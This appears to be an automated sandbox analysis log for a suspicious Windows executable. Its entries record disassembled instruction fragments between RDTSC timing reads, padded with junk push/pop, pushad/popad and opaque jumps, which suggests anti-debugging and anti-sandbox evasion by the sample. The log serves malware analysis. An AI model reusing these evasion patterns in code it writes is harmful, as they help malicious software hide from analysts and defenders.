Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0B57 second address: 7C0B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9498E4A787h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9498E4A77Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C12B9 second address: 7C12BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C12BF second address: 7C12C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C12C9 second address: 7C12D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F94990FE566h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C12D4 second address: 7C12DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C19C5 second address: 7C19EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007F94990FE566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jns 00007F94990FE566h 0x00000013 jmp 00007F94990FE572h 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BF8B2 second address: 7BF8B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BF8B8 second address: 7BF8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F94990FE566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BF8C2 second address: 7BF8D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9498E4A77Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C8393 second address: 7C83C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F94990FE575h 0x0000000c jnp 00007F94990FE566h 0x00000012 popad 0x00000013 push edi 0x00000014 jmp 00007F94990FE56Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C83C7 second address: 7C83D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D59A9 second address: 7D59AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D59AF second address: 7D59B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D59B5 second address: 7D59C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D59C1 second address: 7D59C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D59C5 second address: 7D5A19 instructions: 0x00000000 rdtsc 0x00000002 je 00007F94990FE566h 0x00000008 jmp 00007F94990FE576h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F94990FE573h 0x0000001a jmp 00007F94990FE56Fh 0x0000001f popad 0x00000020 push edi 0x00000021 je 00007F94990FE566h 0x00000027 pop edi 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5A19 second address: 7D5A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D538F second address: 7D5393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5393 second address: 7D53BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F9498E4A783h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9498E4A77Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D53BA second address: 7D53BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D53BE second address: 7D53C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5544 second address: 7D555D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 ja 00007F94990FE56Eh 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA29E second address: 7DA2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007F9498E4A776h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F9498E4A77Ch 0x00000012 jns 00007F9498E4A776h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9E4D second address: 7D9E57 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F94990FE566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DFF28 second address: 7DFF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A783h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DFF40 second address: 7DFF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e je 00007F94990FE566h 0x00000014 jnl 00007F94990FE566h 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DFF5B second address: 7DFF7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A786h 0x00000007 je 00007F9498E4A77Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E462A second address: 7E4635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4635 second address: 7E463B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E463B second address: 7E4672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F94990FE56Ah 0x0000000c jmp 00007F94990FE572h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F94990FE56Fh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4672 second address: 7E468D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F9498E4A778h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jl 00007F9498E4A776h 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F4390 second address: 7F43BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F94990FE581h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F43BB second address: 7F43BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F43BF second address: 7F43C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F44E9 second address: 7F44EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F44EF second address: 7F44FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F44FE second address: 7F451A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A788h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F4662 second address: 7F466A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F466A second address: 7F4686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007F9498E4A782h 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F4686 second address: 7F46AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F94990FE56Ch 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F94990FE56Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F46AE second address: 7F46B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F4C58 second address: 7F4C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F4C60 second address: 7F4C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F4C66 second address: 7F4C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F94990FE566h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F4C75 second address: 7F4C8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F9498E4A776h 0x00000010 jp 00007F9498E4A776h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9E7A second address: 7F9E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9E7E second address: 7F9E98 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9498E4A782h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9E98 second address: 7F9ECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE579h 0x00000007 jmp 00007F94990FE577h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8018B8 second address: 8018BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8018BE second address: 8018C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8018C9 second address: 8018DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9498E4A77Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8018DA second address: 8018DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8018DE second address: 801908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9498E4A782h 0x00000010 jmp 00007F9498E4A77Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805755 second address: 805759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805759 second address: 80577E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9498E4A776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F9498E4A782h 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80577E second address: 8057B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F94990FE579h 0x00000008 pop ecx 0x00000009 js 00007F94990FE57Bh 0x0000000f jmp 00007F94990FE56Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8098BA second address: 8098C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9498E4A776h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 803B48 second address: 803B58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jne 00007F94990FE566h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 803B58 second address: 803B70 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9498E4A77Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F9498E4A7A3h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 803B70 second address: 803B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 803B74 second address: 803B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81677C second address: 8167B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F94990FE574h 0x00000009 jmp 00007F94990FE572h 0x0000000e popad 0x0000000f jns 00007F94990FE56Eh 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8162D0 second address: 8162D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8162D4 second address: 8162DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8162DE second address: 8162E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 825C04 second address: 825C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 825D7F second address: 825DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A77Bh 0x00000007 jmp 00007F9498E4A786h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F9498E4A781h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 825DB5 second address: 825E05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F94990FE575h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F94990FE578h 0x0000000f jmp 00007F94990FE577h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 825E05 second address: 825E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82660D second address: 826611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 826611 second address: 826617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 826617 second address: 82662C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE56Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82662C second address: 826654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9498E4A77Dh 0x0000000b popad 0x0000000c jmp 00007F9498E4A784h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8267CC second address: 8267FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F94990FE572h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F94990FE576h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8267FC second address: 826800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82693A second address: 826960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F94990FE56Fh 0x0000000b jmp 00007F94990FE56Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 826960 second address: 826965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 826965 second address: 826995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F94990FE571h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F94990FE56Eh 0x00000011 popad 0x00000012 pushad 0x00000013 jne 00007F94990FE566h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 826ACE second address: 826AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F9498E4A783h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 826AEA second address: 826AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C45C second address: 82C464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C869 second address: 82C884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C884 second address: 82C88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F9498E4A776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C88E second address: 82C934 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F94990FE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jno 00007F94990FE56Ah 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F94990FE568h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push edx 0x0000002f push esi 0x00000030 stc 0x00000031 pop edx 0x00000032 pop edx 0x00000033 add dword ptr [ebp+122D1C74h], ecx 0x00000039 push dword ptr [ebp+122D1A6Eh] 0x0000003f mov dword ptr [ebp+122D1DF6h], ecx 0x00000045 call 00007F94990FE569h 0x0000004a jnc 00007F94990FE583h 0x00000050 push eax 0x00000051 pushad 0x00000052 push edi 0x00000053 jnp 00007F94990FE566h 0x00000059 pop edi 0x0000005a push ecx 0x0000005b jmp 00007F94990FE56Fh 0x00000060 pop ecx 0x00000061 popad 0x00000062 mov eax, dword ptr [esp+04h] 0x00000066 pushad 0x00000067 pushad 0x00000068 pushad 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C934 second address: 82C945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C945 second address: 82C949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C949 second address: 82C957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F9498E4A77Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82E0F8 second address: 82E10D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE571h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82E10D second address: 82E121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F9498E4A776h 0x0000000e jnc 00007F9498E4A776h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82E121 second address: 82E14E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F94990FE56Fh 0x0000000e pop edx 0x0000000f jne 00007F94990FE56Ah 0x00000015 popad 0x00000016 pushad 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
